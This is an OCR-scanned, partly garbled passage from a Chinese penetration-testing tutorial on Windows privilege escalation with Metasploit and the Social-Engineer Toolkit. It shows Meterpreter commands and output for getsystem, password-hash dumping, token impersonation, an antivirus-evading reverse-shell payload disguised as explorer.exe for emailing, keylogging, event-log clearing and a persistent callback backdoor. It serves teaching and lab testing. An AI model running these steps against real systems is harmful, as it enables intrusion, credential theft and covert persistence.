[*] Meterpreter session 2 opened (192.168.6.103:4444 -> 192.168.6.106:49206) at 2014-07-18 


10:15:38 +0800 
meterpreter > 


从 输出 的 信息 中 ， 可 以 看 到 目前 登录 的 用 户 实 际 上 是 属于 管理 组 的 成 员 ， 并 且 绕 过 了 
UAC 创建 了 一 个 新 的 会 话 。 此 时 就 可 以 提升 用 户 的 权限 了 。 
(6) 查看 lyw 用 户 的 信息 。 执 行 命 令 如 下 所 示 : 


meterpreter > getuid 
Server username: WIN-RKPKQFBLG6C\lyw 


从 输出 信息 中 可 以 看 到 该 用 户 只 是 WIN-RKPKQFBLG6C 计算 机 中 的 一 个 普通 用 户 。 
(7) 提升 lyw 用 户 的 权限 ， 并 合 看 其 用 户 信 息 。 执 行 命令 如 下 所 示 : 


meterpreter > getsystem 

...got system (via technique 1). 

meterpreter > getuid 

Server username: NT AUTHORITY\SYSTEM 


从 输出 信息 中 可 以 看 到 当前 lyw 用 户 ， 拥 有 了 系统 级 唱 的 权限 。 此 时 ， 可 以 进行 任何 
的 操作 。 如 捕获 目标 系统 中 ， 用 户 的 密码 哈 希 值 。 执 行 命令 如 下 所 示 : 


meterpreter > run post/windows/gather/hashdump 

[*] Obtaining the boot key... 

[*] Calculating the hboot key using SYSKEY 88f6c818af614f7033cb885 74907b61c... 
[*] Obtaining the user list and keys... 

[*] Decrypting user keys... 

[*] Dumping password hints... 

Test:"www.123" 

abc: “123456” 

alice: “passwd” 

[*] Dumping password hashes... 


Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b/3c59d7e0c089c 
0: 
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: 
bob:1001:aad3b435b51404eeaad3b435b514046e:32ed87bdb5fdc5e9cba8854737681844::: 


从 输出 的 信息 中 ， 可 以 看 到 目标 系统 中 有 三 个 用 户 ， 并 且 可 以 看 到 它们 的 UID 及 密码 
哈 希 值 。 而 且 ， 还 捕获 到 三 个 键盘 输入 的 密码 。 如 捕获 的 Test 用 户 ， 其 密码 为 www.123。 
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S7E 权限 提升 


权限 提升 就 是 将 欠 个 用 户 原 来 拥有 的 最 低 权限 提高 到 最 蜗 。 通 常 ， 我 们 获得 访问 的 用 
户 可 能 拥有 最 低 的 权限 。 但 是 ， 如 来 要 进行 渗透 攻击 ， 可 能 需要 管理 员 账 号 的 权限 ， 所 以 
就 需要 来 提升 权限 。 权 限 提 升 可 以 通过 使 用 假冒 令 牌 、 本 地 权限 提升 和 社会 工程 学 等 方法 
实现 。 本 章 将 介绍 提升 用 户 权限 的 各 种 方法 。 

本 章 主要 知识 点 如 下 : 

口 使 用 假冒 令 牌 ; 

O 本 地 权限 提升 攻击 ; 

O 使 用 社会 工程 学 工具 包 CET ; 

口 使 用 SET 实施 攻击 。 


7.1 使 用 假冒 令 牌 


使 用 假冒 令 牌 可 以 假冒 一 个 网 络 中 的 男 一 个 用 户 进 行 各 种 操作 ， 如 提升 用 户 权 限 、 创 
建 用 户 和 组 等 。 令 牌 包括 登录 会 话 的 安全 信息 ， 如 用 户 映 份 识别 、 用 户 组 和 用 户 权限 。 当 
一 个 用 户 登 录 Windows 系统 时 ， 它 被 给 定 一 个 访问 令 牌 作为 它 认证 会 话 的 一 部 分 。 例 如 ， 


一 个 入 侵 用 户 可 能 需要 以 域 管理 员 处 理 一 个 特定 任务 ， 当 它 使 用 令 牌 便 可 假冒 域 管理 员 进 
行 工 作 。 当 和 它 处 理 完 任务 时 ， 通 第 会 丢弃 该 令 牌 权限 。 这 样 ， 入 侵 者 将 利用 这 个 弱点 ， 来 


提升 它 的 访问 权限 。 本 节 将 介绍 在 Meterpreter Shell 下 实现 假冒 令 牌 攻击 。 
7.1.1 工作 机 制 
在 假冒 令 牌 攻击 中 需要 使 用 了 Kerberos 协议 。 所 以 在 使 用 假冒 令 牌 前 ， 先 介绍 下 


Kerberos 协议 。Kerberos 是 一 种 网 络 认 证 协议 ， 其 设计 目标 是 通过 密 钥 系统 为 客户 机 /服务 
器 应 用 程序 提供 强大 的 认证 服务 。Kerberos 工作 机 制 如 图 7.1 Pras. 


Q 上 传 证 书 $ 
s 服务 器 


认证 服务 器 AS 


图 7.1 Kerberos 工作 机 制 
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客户 响 请 求证 书 的 过 程 如 下 所 示 : 

C1) 客户 问 问 认证 服务 器 CASO 发 送 请 求 ， 要 求 得 到 服务 器 的 证 书 。 

(2) AS 收 到 请 求 后 ， 将 包 合 客户 端 密 钥 的 加 密 证 书 啊 应 发 送 给 客户 端 。 该 证 书包 括 
服务 器 ticket( 包 括 服务 器 密 钥 加 密 的 客户 机 身份 和 一 份 会 话 密 钥 ) 和 一 个 临时 加 密 密 钥 (又 
称 为 会 话 密 钥 session key) 。 当 然 ， 认 证 服务 器 会 将 该 证 书 给 服务 器 也 发 送 一 份 ， 用 来 使 
服务 器 认证 登录 客户 端 身 份 。 

(3) RP WX ticket 传送 到 服务 器 上 ， 服 务 器 确认 该 客户 端的 话 ， 便 允许 它 登 录 服 
DEM 
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7.1.2 使 用 假冒 令 牌 


为 了 获取 一 个 Meterpreter Shell， 用 户 必 须 使 用 Metasploit 去 攻击 一 台 主 机 后 才 可 成 功 
建立 Meterpreter 会 话 。 对 于 使 用 Metasploit 攻击 主机 的 方法 ， 在 第 6 章 有 详细 介绍 ， 这 里 
就 不 再 资 述 。 使 用 令 牌 假冒 的 具体 操作 步 怒 如 下 所 示 。 

(1) 启动 Meterpreter 会 话 。 执 行 命令 如 下 所 示 : 


msf auxiliary(browser_autopwn) > sessions -i 1 
[*] Starting interaction with 1... 


meterpreter > 


从 输出 的 信息 可 以 看 到 ， 成 功 司 动 了 Meterpreter 会 话 。 
(2) 使 用 use incognito 命令 加 载 incognito 模块 ， 然 后 列举 出 令 牌 。 执 行 命令 如 下 所 示 : 


meterpreter > use incognito 
Loading extension incognito...success. 


输出 的 信息 表示 成 功 加 载 incognito 模块 。 然 后 可 以 通过 碍 看 帮助 信息 ， 了 解 列 举 令 牌 
的 命令 。 执 行 命令 如 下 所 示 : 


meterpreter > help 
Core Commands 


Command Description 
Help menu 
background Backgrounds the current session 
bgkill Kills a background meterpreter script 
bglist Lists running background scripts 
bgrun Executes a meterpreter script as a 
background thread 

channel Displays information about active channels 
close Closes a channel 
disable_unicode_encoding Disables encoding of unicode strings 
enable_unicode_encoding Enables encoding of unicode strings 
exit Terminate the meterpreter session 
help Help menu 
info Displays information about a Post module 
interact Interacts with a channel 
irb Drop into irb scripting mode 

Dae 省 略 部 分 内 容 


Stdapi: Webcam Commands 
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Command Description 

record_mic Record audio from the default microphone for X seconds 
webcam list List webcams 

webcam_snap Take a snapshot from the specified webcam 


Priv: Elevate Commands 


Command Description 
getsystem Attempt to elevate your privilege to that of local system. 
Priv: Password database Commands 


Command Description 
hashdump Dumps the contents of the SAM database 

Priv: Timestomp Commands 
Command Description 
timestomp Manipulate file MACE attributes 

Incognito Commands 
Command Description 
add_group_user Attempt to add a user to a global group with all tokens 
add_localgroup_user Attempt to add a user to a local group with all tokens 
add_user Attempt to add a user with all tokens 
impersonate_token Impersonate specified token 
list_tokens List tokens available under current user context 
snarf hashes Snarf challenge/response hashes for every token 


以 上 输出 信息 显示 incognito 模块 下 的 所 有 命令 。 从 输出 的 信息 中 可 以 看 到 列举 当前 有 
效 的 令 牌 命令 是 list tokens。 执 行 以 上 命令 后 将 输出 大 量 信息 ， 由 于 篇 幅 原 因 ， 部 分 内 容 
使 用 省 略 号 〈.……) 取代 了 。 

(3) 列举 所 有 令 牌 。 执 行 命令 如 下 所 示 : 


meterpreter > list tokens -U 

[-] Warning: Not currently running as SYSTEM, not all tokens will be available 
Call rev2self if primary process token is SYSTEM 

Delegation Tokens Available 


AA-886OKJM26FSVW\Test 
Impersonation Tokens Available 


No tokens available 


M Far th AY fei des AY LA Er $90 oy WO IP] EXC EZ AA-886OKJM26FSWATest 。 其 中 
AA-8860KJM26FSW 表示 目标 系统 的 主机 名 ，Test 表示 登录 的 用 户 名 。 
(4) 使 用 impersonate_token 命令 假冒 Test 用 户 进 行 攻击 。 执 行 命令 如 下 所 示 : 
meterpreter > impersonate token AA-886OKJM26FSW\\Test 
[-] Warning: Not currently running as SYSTEM, not all tokens will be available 
Call rev2self if primary process token is SYSTEM 


[+] Delegation token available 
[+] Successfully impersonated user AA-886OKJM26FSW\Test 


从 输出 的 信息 中 可 以 看 到 假冒 Test KD). Ue at n] AREF A CAMP, EH 
标 系统 中 进行 任何 操作 了 。 
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从 注意 在 输入 HOSTNAME\USERNAME 的 时 候 需 要 输入 两 个 反 儿 杠 (\) 。 


7.2 ”本 地 权限 提升 


EWS ST AMA DAS OW, PERI ZA Oi US UG Wf SEITE Hb BSCE AN 
限 。 提 升 本 地 权限 可 以 使 用 户 访问 目标 系统 ， 并 且 进 行 其 他 的 操作 ， 如 创建 用 户 和 组 等 。 
本 节 将 介绍 本 地 权限 提升 。 

同样 的 实现 本 地 权限 提升 ， 也 需要 连接 到 Meterpreter 会 话 ， 有 具体 操作 就 不 再 介绍 。 本 
地 权限 提升 的 具体 操作 步骤 如 下 所 示 。 

(1) 启动 Meterpreter 会 话 。 执 行 命令 如 下 所 示 : 


msf auxiliary(browser_autopwn) > sessions -i 1 
[*] Starting interaction with 1... 


meterpreter > 


从 输出 的 信息 可 以 看 到 ， 成 功 局 动 了 Meterpreter 会 话 。 
(2) 使 用 getsystem 命令 提升 本 地 权限 。 首 先 ， 碍 看 该 命令 的 帮助 信息 。 执 行 命令 如 
下 所 示 : 


meterpreter > getsystem -h 
Usage: getsystem [options] 
Attempt to elevate your privilege to that of local system. 
OPTIONS: 
-h Help Banner. 
-t<opt> The technique to use. (Default to '0'). 
0 : All techniques available 
1 : Service - Named Pipe Impersonation (In Memory/Admin) 
2 : Service - Named Pipe Impersonation (Dropper/Admin) 
3 : Service - Token Duplication (In Memory/Admin) 


输出 的 信息 显示 了 getsystem 命令 的 语法 格式 、 作 用 及 选项 等 。 此 时 就 可 以 根据 目 己 
的 需要 ， 使 用 相应 的 选项 来 提升 本 地 权限 。 
(3) 使 用 getsystem 命令 提升 本 地 权限 。 执 行 命令 如 下 所 示 : 


meterpreter > getsystem 
...got system (via technique 1). 
meterpreter > 


从 输出 的 信息 可 以 看 到 ， 自 动 选 择 了 方法 1。 此 时 该 用 户 就 拥有 了 目标 系统 中 Test 用 
户 的 权限 了 ， 然 后 束 可 以 做 其 他 的 操作 ， 如 创建 文件 、 创 建 用 户 和 组 等 。 如 使 用 该 用 户 在 
目标 系统 上 192.168.41.146 创建 一 个 名 为 bob 的 用 户 。 执 行 命令 如 下 所 示 : 

meterpreter > add_user bob 123456 -h 192.168.41.146 


执行 以 上 命令 后 ， 可 以 在 主机 192.168.41.146 上 查看 到 创建 的 bob 用 户 。 


7.3 ”使 用 社会 工程 学 工具 包 (SET) 


社会 工程 学 工具 包 〈SET) 是 一 个 开源 的 、Python 驱动 的 社会 工程 学 渗透 测试 工具 。 
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IME TCE MH David Kenned 设计 , 而 且 已 经 成 为 业界 部 署 实 施 社会 工程 学 攻击 的 标准 .SET 
利用 人 们 的 好 奇 心 、 信 任 、 贪 焚 及 一 些 轴 蠢 的 错误 ， 攻 击 人 们 目 身 存在 的 弱点 。 使 用 SET 
可 以 传递 攻击 载荷 到 目标 系统 ， 收 集 目标 系统 数据 ， 创 建 持久 后 门 ， 进 行 中 间 人 攻击 等 。 
本 节 将 介绍 社会 工程 学 工具 包 的 使 用 。 


7.3.1 局 动 社会 工程 学 工具 包 


使 用 社会 工程 学 工具 包 之 前 ， 需 要 局 动 该 工具 。 具 体操 作 步 又 如 下 所 示 。 
(1) 局 动 SET。 在 终 问 执行 如 下 所 示 的 命令 : 
root@kali:~# setoolkit 


或 者 在 果 面 上 依次 选择 “应 用 程序 ”区 ali Linux] “漏洞 利用 工具 集 ”|Social Engineering 
Toolkit|setoolkit 命令 ， 将 目 动 打开 一 个 显示 setoolkit 命令 运行 的 终端 。 
执行 以 上 命令 后 ， 将 输出 如 下 所 示 的 信息 : 


[-] New set_config.py file generated on: 2014-05-06 18:05:41.766123 
[-] Verifying configuration update... 
[*] Update verified, config timestamp is: 2014-05-06 18:05:41.766123 
[*] SET is using the new config, no need to restart 
Copyright 2013, The Social-Engineer Toolkit (SET) by TrustedSec, LLC 
All rights reserved. 
Redistribution and use in source and binary forms, with or without modification, are permitted 
provided that the following conditions are met: 

* Redistributions of source code must retain the above copyright notice, this list of conditions 
and the following disclaimer. 

* Redistributions in binary form must reproduce the above copyright notice, this list of 
conditions and the following disclaimer 

in the documentation and/or other materials provided with the distribution. 

* Neither the name of Social-Engineer Toolkit nor the names of its contributors may be used 

to endorse or promote products derived from 
this software without specific prior written permission. 

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS 
IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT 
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A 
PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT 
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, 
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT 
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF 
THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
The above licensing was taken from the BSD licensing and is applied to Social-Engineer Toolkit 
as well. 
Note that the Social-Engineer Toolkit is provided as is, and is a royalty free open-source 
application. 
Feel free to modify, use, change, market, do whatever you want with it as long as you give the 
appropriate credit where credit 
is due (which means giving the authors the credit they deserve for writing it). Also note that by 
using this software, if you ever 
see the creator of SET in a bar, you should give him a hug and buy him a beer. Hug must last at 
least 5 seconds. Author 
holds the right to refuse the hug or the beer. 
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The Social-Engineer Toolkit is designed purely for good and not evil. If you are planning on using 
this tool for malicious purposes that are 

not authorized by the company you are performing assessments for, you are violating the terms of 
service and license of this toolset. By hitting 

yes (only one time), you agree to the terms of service and that you will only use this tool for lawful 
purposes only. 

Do you agree to the terms of service [y/n]: 


输出 的 信息 详细 的 介绍 了 SET。 该 信息 在 第 一 次 运行 时 ， 才 会 显示 。 在 该 界面 接受 这 
部 分 信息 后 ， 才 可 进行 其 他 操作 。 此 时 输入 y， 将 显示 如 下 所 示 的 信息 : 


= The Social-Engineer Toolkit (SET) E 
[---] Created by: David Kennedy (ReL1K) [—] 
= Version: 5.4.2 = 
= Codename: 'Walkers' ES 
[---] Follow us on Twitter: @TrustedSec [---] 
[---] Follow me on Twitter: @HackingDave [---] 
[---] Homepage: https://www.trustedsec.com [---] 


Welcome to the Social-Engineer Toolkit (SET). 
The one stop shop for all of your SE needs. 
Join us on irc.freenode.net in channel #setoolkit 
The Social-Engineer Toolkit is a product of TrustedSec. 
Visit: https://www.trustedsec.com 
Select from the menu: #SET 菜单 
1) Social-Engineering Attacks 
2) Fast-Track Penetration Testing 
3) Third Party Modules 
4) Update the Metasploit Framework 
5) Update the Social-Engineer Toolkit 
6) Update SET configuration 
T) Help, Credits, and About 
99) Exit the Social-Engineer Toolkit 
set> 


以 上 显示 了 社会 工程 学 工具 包 的 创建 者 、 版 本 、 代 号 及 沫 单 信息 。 此 时 可 以 根据 目 己 
的 和 需要， 选择 相应 的 编写 进行 操作 。 

(2) 这 里 选择 攻击 社会 工程 学 ， 在 菜单 中 的 编写 为 1， 所 以 在 set 忆 后面 输入 1, 将 显示 
如 下 所 示 的 信息 : 

set> 1 


Welcome to the Social-Engineer Toolkit (SET). 
The one stop shop for all of your SE needs. 
Join us on irc.freenode.net in channel #setoolkit 
The Social-Engineer Toolkit is a product of TrustedSec. 
Visit: https://www.trustedsec.com 
Select from the menu: 
1) Spear-Phishing Attack Vectors 
2) Website Attack Vectors 
3) Infectious Media Generator 
4) Create a Payload and Listener 
5) Mass Mailer Attack 
6) Arduino-Based Attack Vector 
7) SMS Spoofing Attack Vector 
8) Wireless Access Point Attack Vector 
9) QRCode Generator Attack Vector 
10) Powershell Attack Vectors 
11) Third Party Modules 
99) Return back to the main menu. 
set> 


oes | 
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这 时 就 可 以 选择 攻击 工程 学 的 类 型 ， 然 


后 进行 攻击 。 
(3) 这 里 选择 创建 一 个 攻击 载荷 和 监听 器 ， 输 入 编号 4， 如 下 所 示 : 
set> 4 


set:payloads> Enter the IP address for the payload (reverse):192.168.41.146 


What payload do you want to generate: 


EERE SAY AE a SA, CEN ARG A CY H hs AR CE PEA YY Bo 


AU o 


(4) 本 例 中 攻击 的 目标 系统 为 Windows XP 32 位 ， 所 以 这 里 选择 编写 2。 如 下 所 示 : 


Name: 
1) Windows Shell Reverse_TCP 


2) Windows Reverse TCP Meterpreter 
3) Windows Reverse_TCP VNC DLL 
4) Windows Bind Shell 
5) Windows Bind Shell X64 
6) Windows Shell Reverse_TCP X64 
7) Windows Meterpreter Reverse_TCP X64 
8) Windows Meterpreter All Ports 
9) Windows Meterpreter Reverse HTTPS 
10) Windows Meterpreter Reverse DNS 
11) SE Toolkit Interactive Shell 
12) SE Toolkit HTTP Reverse Shell 
13) RATTE HTTP Tunneling Payload 
14) ShellCodeExec Alphanum Shellcode 
15) Pylnjector Shellcode Injection 
16) MultiPyInjector Shellcode Injection 


17) Import your own executable 


set:payloads> 2 
Select one of the below, 'backdoored executable’ is typically the best. However, 
most still get picked up by AV. You may need to do additional packing/crypting 


in 


order to get around basic AV detection. 
1)shikata ga nai 
2) No Encoding 
3) Multi-Encoder 
4) Backdoored Executable 


# 设 置 攻击 者 的 IP 地 址 


Description: 


Spawn a command shell on victim 
and send back to attacker 

Spawn a meterpreter shell on 
victim and send back to attacker 
Spawn a VNC server on victim and 
send back to attacker 

Execute payload and create an 
accepting port on remote system 
Windows x64 Command Shell, Bind 
TCP Inline 

Windows X64 Command Shell, 
Reverse TCP Inline 

Connect back to the attacker 
(Windows x64), Meterpreter 
Spawn a meterpreter shell and 
find a port home (every port) 
Tunnel communication over HTTP 
using SSL and use Meterpreter 
Use a hostname instead of an IP 
address and spawn Meterpreter 
Custom interactive reverse 

toolkit designed for SET 

Purely native HTTP shell with 
AES encryption support 

Security bypass payload that 

will tunnel all comms over HTTP 
This will drop a meterpreter 
payload through shellcodeexec 
This will drop a meterpreter 
payload through Pylnjector 

This will drop multiple 

Metasploit payloads via memory 
Specify a path for your own 
executable 


输出 的 信息 显示 了 获取 基于 AV 攻击 的 几 种 方法 。 
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SAER 4 种 ， 输 入 编号 4， 如 下 所 未 : 


set:encoding>4 

set:payloads> PORT of the listener [443]: HEKO S 

[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds... 

[*] Backdoor completed successfully. Payload is now hidden within a legit executable. 


[*] Your payload is now in the root directory of SET as payload.exe 
[-] The payload can be found in the SET home directory. 


set> Start the listener now? [yes|no]: yes # 现 在 启用 监听 的 端口 号 
[-] Please wait while the Metasploit listener is loaded... 

[-] kkk 

[-] * WARNING: Database support has been disabled 

[-] *** 

# cowsayt-* 


« metasploit > 


ps 
Save your shells from AV! Upgrade to advanced AV evasion using dynamic 
exe templates with Metasploit Pro -- type 'go pro' to launch it now. 
-[ metasploit v4.8.2-2014010101 [core:4.8 api:1.0] 
+ -- --=[ 1246 exploits - 678 auxiliary - 198 post 
+ -- --=[ 324 payloads - 32 encoders - 8 nops 
[*] Processing /root/.set/meta config for ERB directives. 
resource (/root/.set/meta config)» use exploit/multi/handler 
resource (/root/.set/meta config)? set PAYLOAD windows/meterpreter/ 
reverse tcp 
PAYLOAD => windows/meterpreter/reverse tcp 
resource (/root/.set/meta config)» set LHOST 192.168.41.234 
LHOST => 192.168.41.234 
resource (/root/.set/meta_config)> set LPORT 443 
LPORT => 443 
resource (/root/.set/meta_config)> set EnableStageEncoding false 
EnableStageEncoding => false 
resource (/root/.set/meta_config)> set ExitOnSession false 
ExitOnSession => false 
resource (/root/.set/meta config)» exploit -j 
[*] Exploit running as background job. 
msf exploit(handler) > 
[*] Started reverse handler on 192.168.41.234:443 


[*] Starting the payload handler... 


输出 的 信息 显示 了 设置 社会 工程 学 的 一 个 过 程 , 在 该 过 程 中 将 指定 的 他 地 址 与 端口 进 
行 了 绑 定 ， 并 且 打 开 了 一 个 handler。 这 里 将 IP 地 址 与 问 口 进行 绑 定 ， 是 因为 一 个 主机 上 
可 能 存在 多 个 网 卡 ， 但 是 交口 号 是 不 变 的 。 这 样 司 动 监 听 顽 后 攻击 主机 将 等 待 衫 渗透 攻击 
的 系统 来 连接 ， 并 负责 处 理 这 些 网 络 连接 。 


7.3.2 传 违 攻击 载 何 给 目标 系统 


Kikki (Payload) 指 的 是 用 书 期 蛆 目标 系统 在 被 渗透 攻击 之 后 执行 的 代码 。 在 
Metasploit 框架 中 可 以 自由 地 选择 、 传 送 和 植 入 。 例 如 ， 反 弹 式 Shell 是 一 种 从 目标 主机 到 
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攻击 主机 创建 网 络 连 接 ， 并 提供 命令 行 Shell 的 攻击 载荷 ， 而 Bind Shell 攻击 载荷 则 在 目标 
系统 上 将 命令 行 Shell REE — AFAFA ig A, Boer n] DAE ex HE hig FA RE FG Shell 
交互 。 攻 击 载荷 也 可 能 是 简单 的 在 目标 系统 上 执行 一 些 命 令 ， 如 添加 用 户 账 号 等 。 下 面 将 
介绍 创建 攻击 载 倚 给 目标 系统 的 方法 。 

传递 攻击 载荷 给 目标 系统 。 有 具体 操作 步骤 如 下 所 示 。 

(1) 社会 工程 学 工具 默认 安装 在 /usrshare/set 下 ， 在 该 目录 中 有 一 个 EXE 文件 ， 名 为 
payload.exe。 在 渗透 测试 时 为 了 避免 被 目标 主机 用 户 发 现 ， 建 议 修改 该 文件 名 ， 然 后 再 发 
送 给 其 他 人 。 发送 给 其 他 人 的 方法 很 多 ， 如 邮件 和 存储 在 优盘 等 。 首 先 切 换 到 /usr/share/set 
目录 中 ， 查 看 该 目录 下 的 文件 。 执 行 命令 如 下 所 示 : 


root@kali:~# cd /usr/share/set/ 

root@kali:/usr/share/set# ls 

= modules readme seautomate setoolkit seupdate src 
config payload.exe README.txt seproxy setup.py seweb 


从 以 上 内 容 中 可 以 看 到 有 一 个 名 为 payload.exe 的 文件 。 接 下 来 可 以 修改 该 文件 的 名 为 
explorer.exe， 然 后 发 送 给 其 他 人 。 
(2) 修改 payload.exe 文件 名 。 执 行 命令 如 下 所 示 : 


root@kali:/usr/share/set# mv payload.exe explorer.exe 

root@kali:/usr/share/set# ls 

= explorer.exe readme seautomate  setoolkit seupdate src 
config modules README.txt seproxy setup.py seweb 


从 以 上 内 容 可 以 看 到 ， 目 前 只 有 一 个 名 为 explorer.exe 文件 。 
(GO 将 该 文件 传递 给 其 他 人 。 如 果 使 用 邮件 的 形式 传递 ， 需 要 将 该 文件 进行 压缩 。 
为 邮件 不 支持 发 送 EXE 文件 。 可 以 使 用 ZIP 命令 压缩 该 文件 ， 如 下 所 示 : 


root@kali:/usr/share/set# zip healthfiles explorer.exe 
adding: explorer.exe (deflated 88%) 


从 输入 内 容 可 以 看 到 ，explorer.exe 文件 被 成 功 压 缩 。 此 时 ， 就 可 以 通过 邮件 的 形式 发 
送 给 其 他 人 。 当 该 内 容 被 目标 系统 中 的 用 户 打 开 后 ， 将 会 与 攻击 者 建立 一 个 活跃 的 会 话 。 
如 下 所 示 : 


msf exploit(handler) > 

[*] Sending stage (769024 bytes) to 192.168.41.146 

[*] Meterpreter session 1 opened (192.168.41.234:443 -> 192.168.41.146:2126) at 2014-05-06 

19:25:43 +0800 

看 到 以 上 内 容 ， 表 示 目 标 系 统 与 攻击 者 成 功 建立 了 会 话 。 现 在 ， 攻 击 者 就 可 以 在 目标 
系统 上 做 自己 想 要 做 的 事 。 


7.3.3 收集 目标 系统 数据 

在 前 面 介绍 了 将 攻击 载 三 传递 给 目标 系统 ， 并 成 功 建立 会 话 。 当 成 功 建立 会 话 后 ， 攻 
击 者 可 以 从 目标 系统 中 收集 其 数据 。 收 集 目 标 系 统 的 数据 ， 使 用 户 尽 可 能 使 用 这 些 信息 做 
进一步 渗透 攻击 。 下 面 将 介绍 收集 目标 系统 的 数据 。 收 集 目标 系统 数据 的 具体 操作 步骤 如 
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FER. 
C1) 激活 Meterpreter 会 话 。 执 行 命令 如 下 所 示 : 


msf exploit(handler) > sessions -i 1 
[*] Starting interaction with 1... 


(2) 开局 键盘 记录 器 。 执 行 命令 如 下 所 示 : 


meterpreter > keyscan start 
Starting the keystroke sniffer... 


G) 收集 目标 系统 中 的 数据 。 执 行 命令 如 下 所 示 : 


meterpreter > keyscan_dump 
Dumping captured keystrokes... 
«Return» «Return» <Return> <N1> <Return> 2 «Return» 34 


从 输出 的 信息 可 以 看 到 ， 目 标 系 统 执行 过 回 车 键 、 输 入 了 数字 1、2 和 34 等 。 
7.3.4 ”清除 踪迹 


当 攻 击 者 入 侵 目 标 系 统 后 ， 做 的 任何 操作 都 可 能 会 被 记录 到 目标 系统 的 日 志文 件 中 。 
为 了 不 被 目标 系统 所 发 现 ， 清 除 踊 迹 是 非常 重要 的 工作 。 因 为 如 果 被 发 现 ， 可 能 种 来 很 大 
的 麻烦 。 现 在 用 户 不 用 担心 这 个 问题 了 ， 因 为 Metasploit 提供 了 一 种 方法 可 以 很 容易 的 来 
清除 所 有 踪迹 。 下 面 将 介绍 使 用 Metasploit 清除 踪迹 的 方法 。 使 用 Metasploit 清除 踪迹 的 
具体 操作 步骤 如 下 所 示 。 

(1) 激活 Meterpreter 会 话 。 执 行 命令 如 下 所 示 : 


msf exploit(handler) > sessions -i 1 
[*] Starting interaction with 1... 


(2) 在 Metasploit 中 的 irb 命令 可 以 清除 踪迹 。 执 行 命令 如 下 所 示 : 


meterpreter > irb 

[*] Starting IRB shell 

[*] The ‘client’ variable holds the meterpreter client 
o> 


输出 的 信息 中 看 到 >> 提 示 符 ， 表 示 成 功 运 行 了 irb 命令 。 
G) 设置 想 要 删除 的 日 志 。 常 用 的 日 志 选 项 如 下 所 示 : 
log = client.sys.eventlog.open('system'); 

log = client.sys.eventlog.open('security’); 

log = client.sys.eventlog.open(‘application'); 

log = client.sys.eventlog.open(‘directory service"); 


log = client.sys.eventlog.open('dns server"); 


OOOOUL 


log = client.sys.eventlog.open('file replication service"). 
这 里 清除 所 有 日 志 。 执 行 命令 如 下 所 示 : 


>> log = client.sys.eventlog.open(‘system’) 
>> log = client.sys.eventlog.open(‘security') 
>> log = client.sys.eventlog.open(' application") 
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>> log = client.sys.eventlog.open(' directory service") 
>> log = client.sys.eventlog.open('dns server) 
>> log = client.sys.eventlog.open('file replication service") 


执行 以 上 命令 后 ， 表 示 指 定 了 要 清除 的 日 志 。 接 下 来 需要 执行 log.clear 命令 才 可 以 清 
除 日 志文 件 。 执 行 命令 如 下 所 示 : 


>> log.clear 


PUTO Ear ya, KZ Bee FAA AY ea ak 


7.3.5 创建 持久 后 门 


当成 功 获取 目标 系统 的 访问 权限 后 ， 需 要 寻找 方法 来 恢复 与 目标 主机 的 连接 ， 而 无 需 
再 进入 目标 系统 。 如 条目 标 用 户 破 坏 了 该 连接 ， 例 如 重新 局 动 计 算 机 ， 此 时 使 用 后 门将 人 允 
许 上 自动 重新 与 目标 系统 建立 连接 。 为 了 后 续 渗 透 方便 ， 所 以 需要 创建 一 个 后 门 。 这 样 ， 即 
使 连接 被 中 断 ， 也 不 会 影响 工作 。 下 面 将 介绍 创建 持久 后 门 。 创 建 持 和 久 后 门 的 具体 操作 步 
又 如 下 上 所 示 。 

(1) 激活 Meterpreter 会 话 。 执 行 命令 如 下 所 示 : 

msf exploit(handler) > sessions -i 1 

[*] Starting interaction with 1... 

meterpreter > 


(2) 创建 持久 后 门 之 前 ， 先 合 看 下 它 的 帮助 文件 。 执 行 命 令 如 下 所 示 : 


meterpreter > run persistence -h 

Meterpreter Script for creating a persistent backdoor on a target host. 

OPTIONS: 
-A Automatically start a matching multi/handler to connect to the agent 
-L «opt» Location in target host where to write payload to, if none %TEMP% will be used. 
-P «opt» Payload to use, default is windows/meterpreter/reverse tcp. 


-S Automatically start the agent on boot as a service (with SYSTEM privileges) 
-T <opt> Alternate executable template to use 

-U Automatically start the agent when the User logs on 

-X Automatically start the agent when the system boots 

-h This help menu 


-i «opt» The interval in seconds between each connection attempt 
-p «opt» The port on the remote host where Metasploit is listening 
-r «opt» The IP of the system running Metasploit listening for the connect back 


以 上 信息 显示 了 持久 后 门 的 一 些 选项 。 使 用 不 同 的 选项 ， 来 设置 后 门 。 
(3) 创建 一 个 持久 后 门 。 执 行 命令 如 下 所 示 : 


meterpreter > run persistence -U -A -i 10 - 8090 -r 192.168.41.234 

[*] Running Persistance Script 

[*] Resource file for cleanup created at /root/.msf4/logs/persistence/ 
AA-886OKJM26FSW_20140507.2857/AA-886OKJM26FSW_20140507.2857.rc 

[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.41.234 LPORT=4444 
[*] Persistent agent script is 148405 bytes long 

[+] Persistent Script written to C:\DOCUME~1\Test\LOCALS~1\Temp\IzXBdJvcpnD.vbs 

[*] Starting connection handler at port 4444 for windows/meterpreter/reverse tcp 

[*] Multi/Handler started! 
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[*] Executing script C:\DOCUME~1\Test\LOCALS~1\Temp\lzXBdJvcpnD.vbs 


[+] Agent executed with PID 1612 
